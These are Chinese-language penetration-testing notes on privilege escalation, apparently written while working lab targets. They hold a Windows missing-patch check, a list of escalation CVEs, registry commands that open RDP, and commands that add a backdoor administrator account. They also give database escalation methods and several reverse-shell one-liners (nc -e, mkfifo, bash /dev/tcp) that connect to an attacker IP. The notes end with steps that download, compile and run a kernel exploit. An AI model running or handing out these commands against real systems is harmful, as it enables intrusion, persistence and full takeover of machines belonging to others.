[渗透测试]:提权
[渗透测试]:提权
提权
权限提升
水平权限提升(越权)
A|B(A,B同级) C 是管理员
垂直权限提升
普通用户获得了管理员的权限
Web 用户直接提权成管理员用户
基于WebShell 的提权
IIS 的 aspx 大马
asp 脚本权限比较低
尝试上传aspx 的大马
Windows
如果目标使用的是套件搭建的网站
phpstudy
xampp
wampserver
获得WebShell 之后就是系统或管理员权限
宝塔
权限?
安全防御比较高,禁用很多函数,考虑绕过
系统漏洞提权
找补丁,找漏洞,找EXP
Win2003
信息收集
----------------
systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt
----------------
----------------------------------------
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS15-097 [KB3089656] [remote code execution] (win8.1/2012)
MS15-076 [KB3067505] [RPC] (2003/2008/7/8/2012)
MS15-077 [KB3077657] [ATM] (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 [KB3057839] [Kernel Driver] (2003/2008/7/8/2012)
MS15-051 [KB3057191] [Windows Kernel Mode Drivers] (2003/2008/7/8/2012)
MS15-010 [KB3036220] [Kernel Driver] (2003/2008/7/8)
MS15-015 [KB3031432] [Kernel Driver] (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 [KB3023266] [Kernel Driver] (2008/2012/7/8)
MS14-070 [KB2989935] [Kernel Driver] (2003)
MS14-068 [KB3011780] [Domain Privilege Escalation] (2003/2008/2012/7/8)
MS14-058 [KB3000061] [Win32k.sys] (2003/2008/2012/7/8)
MS14-040 [KB2975684] [AFD Driver] (2003/2008/2012/7/8)
MS14-002 [KB2914368] [NDProxy] (2003/XP)
MS13-053 [KB2850851] [win32k.sys] (XP/Vista/2003/2008/win 7)
MS13-046 [KB2840221] [dxgkrnl.sys] (Vista/2003/2008/2012/7)
MS13-005 [KB2778930] [Kernel Mode Driver] (2003/2008/2012/win7/8)
MS12-042 [KB2972621] [Service Bus] (2008/2012/win7)
MS12-020 [KB2671387] [RDP] (2003/2008/7/XP)
MS11-080 [KB2592799] [AFD.sys] (2003/XP)
MS11-062 [KB2566454] [NDISTAPI] (2003/XP)
MS11-046 [KB2503665] [AFD.sys] (2003/2008/7/XP)
MS11-011 [KB2393802] [kernel Driver] (2003/2008/7/XP/Vista)
MS10-092 [KB2305420] [Task Scheduler] (2008/7)
MS10-065 [KB2267960] [FastCGI] (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 [KB982799] [ACL-Churraskito] (2008/7/Vista)
MS10-048 [KB2160329] [win32k.sys] (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 [KB977165] [KiTrap0D] (2003/2008/7/XP)
MS09-050 [KB975517] [Remote Code Execution] (2008/Vista)
MS09-020 [KB970483] [IIS 6.0] (IIS 5.1 and 6.0)
MS09-012 [KB959454] [Chimichurri] (Vista/win7/2008/Vista)
MS08-068 [KB957097] [Remote Code Execution] (2000/XP)
MS08-067 [KB958644] [Remote Code Execution] (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 [KB941693] [Win32.sys] (XP/2003/2008/Vista)
MS06-040 [KB921883] [Remote Code Execution] (2003/xp/2000)
MS05-039 [KB899588] [PnP Service] (Win 9X/ME/NT/2000/XP/2003)
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
----------------------------------------
可能会遇到的问题
1、无法执行cmd命令(自己上传一个cmd,或者考虑使用aspx大马)
2、无法上传提权exp
目录写权限
哪些目录有写权限?
日志
缓存
回收站
大马所在目录
3、在命令行下开启3389 端口
----------
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
-----------
4、如何创建Windows 用户
net user hack 123.com /add
net localgroup administrators hack /add
数据库提权
MSSQL
xp_cmdshell cmd 命令
前提,获取mssql sa 的密码
mysql 提权
利用mysql 执行cmd 命令
udf
mof
反弹Shell
基于WebShell 反弹Shell
建立一个持久性的连接
shell 命令解释器
正向Shell 我主动连接服务器,服务器开始ssh 端口
反向Shell 服务器主动连接我们,我们监听某一个端口
windows
nc.exe(网络界的瑞士军刀)va
powershell
kali
nc
mac
nc 不行
ncat namp
windows
nc.exe
我(kali):nc -lvvp 1234
服务器(win2008):nc.exe -e cmd.exe 192.168.1.200 1234
Linux
NC 本地监听
[nc -lvvp 1234]
NC反弹
-e 参数可用
[nc -e /bin/bash 192.168.1.150 1234]
-------------------
当我们执行这条命令,出现Ncat: Permission denied.
我们通过查看系统日志
[tail /var/log/messages]
解决方法:
原因:selinux的拦截
方法:将ncat限制给去掉了
ausearch -c 'nc' --raw | audit2allow -M my-nc
semodule -i my-nc.pp
-----------------
进入交互式shell
[python -c 'import pty;pty.spawn("/bin/bash")']
-e 参数不可用
[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.150 1234 >/tmp/f]
bash
[bash -i >& /dev/tcp/192.168.1.150/1234 0<&1]
Linux
利用系统漏洞提权
内核提权
第三方软件
套路比较多
实战中体会
dc 系列
靶机渗透
提权操作
收集系统信息
uname -a
提权辅助脚本
wget
[wget http://192.168.1.200:8000/linux-exploit-suggester.sh > les.sh]
curl
注:由于权限的问题,笔者这里没有成功
搜索漏洞库
Kali 漏洞库
searchsploit centos 7
searchsploit -m 35370
Kali 中开启httpd服务
python -m SimpleHTTPServer 8080
下载35370.c文件
wget http://192.168.1.150:8000/23270.c
运行提权脚本
gcc 35370.c -o exploit -lpthread
./exploit
id
